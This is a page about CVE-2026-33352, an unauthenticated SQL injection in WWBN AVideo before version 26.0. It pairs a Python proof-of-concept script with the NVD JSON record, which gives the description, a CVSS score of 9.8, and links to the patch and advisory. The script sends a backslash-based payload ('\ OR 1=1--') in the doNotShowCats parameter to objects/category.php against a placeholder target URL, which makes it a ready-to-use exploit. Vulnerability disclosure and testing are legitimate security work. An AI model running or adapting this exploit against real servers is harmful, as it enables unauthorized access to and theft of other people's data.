CVE-2026-33352

import requests def check_sqli(url): # Target endpoint based on vulnerability description target = f"{url}/objects/category.php" # The vulnerability lies in the 'doNotShowCats' parameter. # The application strips single quotes (') using str_replace. # We use a backslash (\) to escape the closing quote in the SQL query. # Conceptual SQL: SELECT * FROM categories WHERE doNotShowCats = '[INPUT]' # Payload: \ OR 1=1-- # After filter: \ OR 1=1-- # Resulting SQL: SELECT ... WHERE doNotShowCats = '\' OR 1=1--' # The backslash escapes the quote, injecting the OR condition. payload = "\\ OR 1=1--" params = { "doNotShowCats": payload } try: print(f"[+] Sending request to {target}") response = requests.get(target, params=params, timeout=10) # Analyze response to confirm injection (e.g., specific data or error) if response.status_code == 200: print("[+] Request sent successfully. Check response manually for data leakage or errors.") print(f"[+] Response length: {len(response.text)}") return True else: print("[-] Unexpected status code.") return False except Exception as e: print(f"Error: {e}") return False # Example usage # check_sqli("http://target-avideo-server.com")

{"cve": {"id": "CVE-2026-33352", "sourceIdentifier": "[email protected]", "published": "2026-03-23T14:16:33.580", "lastModified": "2026-03-23T15:56:03.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, an unauthenticated SQL injection vulnerability exists in `objects/category.php` in the `getAllCategories()` method. The `doNotShowCats` request parameter is sanitized only by stripping single-quote characters (`str_replace(\"'\", '', ...)`), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in `objects/security.php`. Version 26.0 contains a patch for the issue."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. Antes de la versión 26.0, existe una vulnerabilidad de inyección SQL no autenticada en objects/category.php, en el método getAllCategories(). El parámetro de solicitud doNotShowCats se sanea solo eliminando caracteres de comilla simple (str_replace(''', '', ...)), pero esto se elude trivialmente utilizando una técnica de escape con barra invertida para desplazar los límites de la cadena SQL. El parámetro no está cubierto por ninguno de los filtros de entrada globales de la aplicación en objects/security.php. La versión 26.0 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.0", "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/206d38e97b8c854771bb2907b13f9f36e8bcf874", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mcj5-6qr4-95fj", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}